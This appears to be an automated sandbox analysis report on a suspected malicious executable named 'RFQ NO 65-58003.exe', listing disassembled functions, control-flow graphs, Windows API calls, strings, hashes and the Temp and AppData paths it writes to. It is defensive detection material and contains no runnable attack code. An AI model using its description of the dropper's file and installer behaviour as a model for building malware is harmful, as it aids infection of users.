                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                              • String ID: (7B${
                                                              • API String ID: 590372296-525222780
                                                              • Opcode ID: 972fd15b03a93e7331ef4c8797c1849d59520224656438122eee1199d8052db9
                                                              • Instruction ID: 42ee76c5c0789c909e5484b793d5ed8b68dab9236198efc003755603ec60545b
                                                              • Opcode Fuzzy Hash: 972fd15b03a93e7331ef4c8797c1849d59520224656438122eee1199d8052db9
                                                              • Instruction Fuzzy Hash: A4B16971900608FFDB119FA0DD89AAE7B79FB08354F00847AFA45B61A0CB754E51DF68
                                                              Function 00405A03 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 492 405a03-405a29 call 405cce 495 405a42-405a49 492->495 496 405a2b-405a3d DeleteFileW 492->496 498 405a4b-405a4d 495->498 499 405a5c-405a6c call 406212 495->499 497 405bbf-405bc3 496->497 500 405a53-405a56 498->500 501 405b6d-405b72 498->501 507 405a7b-405a7c call 405c12 499->507 508 405a6e-405a79 lstrcatW 499->508 500->499 500->501 501->497 503 405b74-405b77 501->503 505 405b81-405b89 call 406555 503->505 506 405b79-405b7f 503->506 505->497 516 405b8b-405b9f call 405bc6 call 4059bb 505->516 506->497 511 405a81-405a85 507->511 508->511 512 405a91-405a97 lstrcatW 511->512 513 405a87-405a8f 511->513 515 405a9c-405ab8 lstrlenW FindFirstFileW 512->515 513->512 513->515 517 405b62-405b66 515->517 518 405abe-405ac6 515->518 532 405ba1-405ba4 516->532 533 405bb7-405bba call 405371 516->533 517->501 523 405b68 517->523 520 405ae6-405afa call 406212 518->520 521 405ac8-405ad0 518->521 534 405b11-405b1c call 4059bb 520->534 535 405afc-405b04 520->535 524 405ad2-405ada 521->524 525 405b45-405b55 FindNextFileW 521->525 523->501 524->520 528 405adc-405ae4 524->528 525->518 531 405b5b-405b5c FindClose 525->531 528->520 528->525 531->517 532->506 538 405ba6-405bb5 call 405371 call 4060b3 532->538 533->497 543 405b3d-405b40 call 405371 534->543 544 405b1e-405b21 534->544 535->525 539 405b06-405b0f call 405a03 535->539 538->497 539->525 543->525 547 405b23-405b33 call 405371 call 4060b3 544->547 548 405b35-405b3b 544->548 547->525 548->525
                                                              APIs
                                                              • DeleteFileW.KERNELBASE(?,?,76233420,76232EE0,00000000), ref: 00405A2C
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\*.*,?,?,76233420,76232EE0,00000000), ref: 00405A74
                                                              • lstrcatW.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\*.*,?,?,76233420,76232EE0,00000000), ref: 00405A97
                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\*.*,?,?,76233420,76232EE0,00000000), ref: 00405A9D
                                                              • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\*.*,?,?,76233420,76232EE0,00000000), ref: 00405AAD
                                                              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B4D
                                                              • FindClose.KERNELBASE(00000000), ref: 00405B5C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                              • String ID: "C:\Users\user\Desktop\RFQ NO 65-58003.exe"$C:\Users\user\AppData\Local\Temp\nsm1096.tmp\*.*$\*.*
                                                              • API String ID: 2035342205-2402350367
                                                              • Opcode ID: bf521971237f06a6bfd3a8137c3f0154ea7fee40ee360af2ff33bb12ffbce5a4
                                                              • Instruction ID: 3abc1f52a39f62d65ddaa07d2a5323def7e4f5b1e1581b0ba6d8596f0725500f
                                                              • Opcode Fuzzy Hash: bf521971237f06a6bfd3a8137c3f0154ea7fee40ee360af2ff33bb12ffbce5a4
                                                              • Instruction Fuzzy Hash: FA41CE30901A18AADB31AB668C89ABF7678EF41714F10427BF801711D1D7BC69829E6E
                                                              Function 004068DA Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
                                                              • Instruction ID: a9eeadc94889c10b02ffd6b9c25b4bb5d01c95f6ce45251ce11bee8d9ce53b4a
                                                              • Opcode Fuzzy Hash: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
                                                              • Instruction Fuzzy Hash: BFF18671D04229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281C7785A86CF45
                                                              Function 00406555 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405D17,00425F30,00425F30,00000000,00425F30,00425F30, 4#v.#v,?,76232EE0,00405A23,?,76233420,76232EE0), ref: 00406560
                                                              • FindClose.KERNEL32(00000000), ref: 0040656C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID: xgB
                                                              • API String ID: 2295610775-399326502
                                                              • Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                              • Instruction ID: a17ed3a5ae88bd5f55df5b749dd223de66f1ff534e9406d7b6838b5a0b6fdea6
                                                              • Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                              • Instruction Fuzzy Hash: 6FD01231904530ABC3111778BE0CC5B7A689F553717628F36F466F12F4C7348C22869C
                                                              Function 0040287E Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040288D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID:
                                                              • API String ID: 1974802433-0
                                                              • Opcode ID: 9323f67070c748f2fb38eb47c4ecaa0c4878dfa375b749d9aa371aba0a027b7e
                                                              • Instruction ID: 47d6d4f0c9e08c45c0f9c68b677465f339eb18c6442485c4f22287ce904ecf90
                                                              • Opcode Fuzzy Hash: 9323f67070c748f2fb38eb47c4ecaa0c4878dfa375b749d9aa371aba0a027b7e
                                                              • Instruction Fuzzy Hash: 76F08971A04104DBDB50EBE4D94999DB374EF14314F2185BBE112F71D0D7B849819B29
                                                              Function 00403DFE Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 182 403dfe-403e10 183 403f51-403f60 182->183 184 403e16-403e1c 182->184 186 403f62-403faa GetDlgItem * 2 call 4042d6 SetClassLongW call 40140b 183->186 187 403faf-403fc4 183->187 184->183 185 403e22-403e2b 184->185 188 403e40-403e43 185->188 189 403e2d-403e3a SetWindowPos 185->189 186->187 191 404004-404009 call 404322 187->191 192 403fc6-403fc9 187->192 194 403e45-403e57 ShowWindow 188->194 195 403e5d-403e63 188->195 189->188 201 40400e-404029 191->201 197 403fcb-403fd6 call 401389 192->197 198 403ffc-403ffe 192->198 194->195 202 403e65-403e7a DestroyWindow 195->202 203 403e7f-403e82 195->203 197->198 213 403fd8-403ff7 SendMessageW 197->213 198->191 200 4042a3 198->200 208 4042a5-4042ac 200->208 206 404032-404038 201->206 207 40402b-40402d call 40140b 201->207 209 404280-404286 202->209 211 403e84-403e90 SetWindowLongW 203->211 212 403e95-403e9b 203->212 216 404261-40427a DestroyWindow KiUserCallbackDispatcher 206->216 217 40403e-404049 206->217 207->206 209->200 214 404288-40428e 209->214 211->208 218 403ea1-403eb2 GetDlgItem 212->218 219 403f3e-403f4c call 40433d 212->219 213->208 214->200 223 404290-404299 ShowWindow 214->223 216->209 217->216 224 40404f-40409c call 406234 call 4042d6 * 3 GetDlgItem 217->224 220 403ed1-403ed4 218->220 221 403eb4-403ecb SendMessageW IsWindowEnabled 218->221 219->208 225 403ed6-403ed7 220->225 226 403ed9-403edc 220->226 221->200 221->220 223->200 252 4040a6-4040e2 ShowWindow KiUserCallbackDispatcher call 4042f8 EnableWindow 224->252 253 40409e-4040a3 224->253 229 403f07-403f0c call 4042af 225->229 230 403eea-403eef 226->230 231 403ede-403ee4 226->231 229->219 233 403f25-403f38 SendMessageW 230->233 235 403ef1-403ef7 230->235 231->233 234 403ee6-403ee8 231->234 233->219 234->229 238 403ef9-403eff call 40140b 235->238 239 403f0e-403f17 call 40140b 235->239 250 403f05 238->250 239->219 248 403f19-403f23 239->248 248->250 250->229 256 4040e4-4040e5 252->256 257 4040e7 252->257 253->252 258 4040e9-404117 GetSystemMenu EnableMenuItem SendMessageW 256->258 257->258 259 404119-40412a SendMessageW 258->259 260 40412c 258->260 261 404132-404170 call 40430b call 406212 lstrlenW call 406234 SetWindowTextW call 401389 259->261 260->261 261->201 270 404176-404178 261->270 270->201 271 40417e-404182 270->271 272 4041a1-4041b5 DestroyWindow 271->272 273 404184-40418a 271->273 272->209 275 4041bb-4041e8 CreateDialogParamW 272->275 273->200 274 404190-404196 273->274 274->201 276 40419c 274->276 275->209 277 4041ee-404245 call 4042d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 275->277 276->200 277->200 282 404247-40425a ShowWindow call 404322 277->282 284 40425f 282->284 284->209
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E3A
                                                              • ShowWindow.USER32(?), ref: 00403E57
                                                              • DestroyWindow.USER32 ref: 00403E6B
                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403E87
                                                              • GetDlgItem.USER32(?,?), ref: 00403EA8
                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBC
                                                              • IsWindowEnabled.USER32(00000000), ref: 00403EC3
                                                              • GetDlgItem.USER32(?,00000001), ref: 00403F71
                                                              • GetDlgItem.USER32(?,00000002), ref: 00403F7B
                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403F95
                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403FE6
                                                              • GetDlgItem.USER32(?,00000003), ref: 0040408C
                                                              • ShowWindow.USER32(00000000,?), ref: 004040AD
                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040BF
                                                              • EnableWindow.USER32(?,?), ref: 004040DA
                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040F0
                                                              • EnableMenuItem.USER32(00000000), ref: 004040F7
                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040410F
                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404122
                                                              • lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 0040414B
                                                              • SetWindowTextW.USER32(?,00423728), ref: 0040415F
                                                              • ShowWindow.USER32(?,0000000A), ref: 00404293
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                              • String ID: (7B
                                                              • API String ID: 3282139019-3251261122
                                                              • Opcode ID: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
                                                              • Instruction ID: fc2721e09aaab4c72f4ebfdf2c157598dee1e076b88a1be66e463b94688f5fa6
                                                              • Opcode Fuzzy Hash: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
                                                              • Instruction Fuzzy Hash: 6BC1C2B1600201FFCB21AF61ED85E2B3AB9EB95345F40057EFA41B11F0CB7998529B2D
                                                              Function 00403A5B Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 285 403a5b-403a73 call 4065ec 288 403a75-403a85 call 406159 285->288 289 403a87-403abe call 4060df 285->289 298 403ae1-403b0a call 403d31 call 405cce 288->298 293 403ac0-403ad1 call 4060df 289->293 294 403ad6-403adc lstrcatW 289->294 293->294 294->298 303 403b10-403b15 298->303 304 403b9c-403ba4 call 405cce 298->304 303->304 305 403b1b-403b35 call 4060df 303->305 309 403bb2-403bd7 LoadImageW 304->309 310 403ba6-403bad call 406234 304->310 311 403b3a-403b43 305->311 314 403c58-403c60 call 40140b 309->314 315 403bd9-403c09 RegisterClassW 309->315 310->309 311->304 312 403b45-403b49 311->312 316 403b5b-403b67 lstrlenW 312->316 317 403b4b-403b58 call 405bf3 312->317 328 403c62-403c65 314->328 329 403c6a-403c75 call 403d31 314->329 318 403d27 315->318 319 403c0f-403c53 SystemParametersInfoW CreateWindowExW 315->319 323 403b69-403b77 lstrcmpiW 316->323 324 403b8f-403b97 call 405bc6 call 406212 316->324 317->316 322 403d29-403d30 318->322 319->314 323->324 327 403b79-403b83 GetFileAttributesW 323->327 324->304 331 403b85-403b87 327->331 332 403b89-403b8a call 405c12 327->332 328->322 338 403c7b-403c95 ShowWindow call 40657c 329->338 339 403cfe-403cff call 405444 329->339 331->324 331->332 332->324 344 403ca1-403cb3 GetClassInfoW 338->344 345 403c97-403c9c call 40657c 338->345 342 403d04-403d06 339->342 346 403d20-403d22 call 40140b 342->346 347 403d08-403d0e 342->347 350 403cb5-403cc5 GetClassInfoW RegisterClassW 344->350 351 403ccb-403cee DialogBoxParamW call 40140b 344->351 345->344 346->318 347->328 352 403d14-403d1b call 40140b 347->352 350->351 355 403cf3-403cfc call 4039ab 351->355 352->328 355->322
                                                              APIs
                                                                • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                                • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                              • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00000000), ref: 00403ADC
                                                              • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,C:\Users\user\AppData\Roaming\afdragsordning,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,76233420), ref: 00403B5C
                                                              • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,C:\Users\user\AppData\Roaming\afdragsordning,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403B6F
                                                              • GetFileAttributesW.KERNEL32(004281E0), ref: 00403B7A
                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\afdragsordning), ref: 00403BC3
                                                                • Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166
                                                              • RegisterClassW.USER32(004291E0), ref: 00403C00
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C18
                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C4D
                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403C83
                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403CAF
                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403CBC
                                                              • RegisterClassW.USER32(004291E0), ref: 00403CC5
                                                              • DialogBoxParamW.USER32(?,00000000,00403DFE,00000000), ref: 00403CE4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: Completed$"C:\Users\user\Desktop\RFQ NO 65-58003.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\afdragsordning$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                              • API String ID: 1975747703-2840682946
                                                              • Opcode ID: 6b377800bd07bcba5734f56e34084f7132bdecffcf0977c8fa7c0fe37e1477d4
                                                              • Instruction ID: a49deb01357f173a4aad96dc60f9d02752f373419f451c4cfac2514e29acbaba
                                                              • Opcode Fuzzy Hash: 6b377800bd07bcba5734f56e34084f7132bdecffcf0977c8fa7c0fe37e1477d4
                                                              • Instruction Fuzzy Hash: ED61C370240300BAD620AF669D45E2B3A7CEB84749F40457EF941B22E2DB7D9D52CA2D
                                                              Function 00402ED5 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 359 402ed5-402f23 GetTickCount GetModuleFileNameW call 405de7 362 402f25-402f2a 359->362 363 402f2f-402f5d call 406212 call 405c12 call 406212 GetFileSize 359->363 365 403174-403178 362->365 371 402f63-402f7a 363->371 372 40304d-40305b call 402e33 363->372 374 402f7c 371->374 375 402f7e-402f8b call 4033ec 371->375 378 403061-403064 372->378 379 40312c-403131 372->379 374->375 383 402f91-402f97 375->383 384 4030e8-4030f0 call 402e33 375->384 381 403090-4030dc GlobalAlloc call 40670b call 405e16 CreateFileW 378->381 382 403066-40307e call 403402 call 4033ec 378->382 379->365 407 4030f2-403122 call 403402 call 40317b 381->407 408 4030de-4030e3 381->408 382->379 410 403084-40308a 382->410 388 403017-40301b 383->388 389 402f99-402fb1 call 405da2 383->389 384->379 392 403024-40302a 388->392 393 40301d-403023 call 402e33 388->393 389->392 406 402fb3-402fba 389->406 398 40302c-40303a call 40669d 392->398 399 40303d-403047 392->399 393->392 398->399 399->371 399->372 406->392 409 402fbc-402fc3 406->409 419 403127-40312a 407->419 408->365 409->392 412 402fc5-402fcc 409->412 410->379 410->381 412->392 414 402fce-402fd5 412->414 414->392 416 402fd7-402ff7 414->416 416->379 418 402ffd-403001 416->418 420 403003-403007 418->420 421 403009-403011 418->421 419->379 422 403133-403144 419->422 420->372 420->421 421->392 423 403013-403015 421->423 424 403146 422->424 425 40314c-403151 422->425 423->392 424->425 426 403152-403158 425->426 426->426 427 40315a-403172 call 405da2 426->427 427->365
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00402EE9
                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ NO 65-58003.exe,00000400), ref: 00402F05
                                                                • Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\RFQ NO 65-58003.exe,80000000,00000003), ref: 00405DEB
                                                                • Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ NO 65-58003.exe,C:\Users\user\Desktop\RFQ NO 65-58003.exe,80000000,00000003), ref: 00402F4E
                                                              • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403095
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
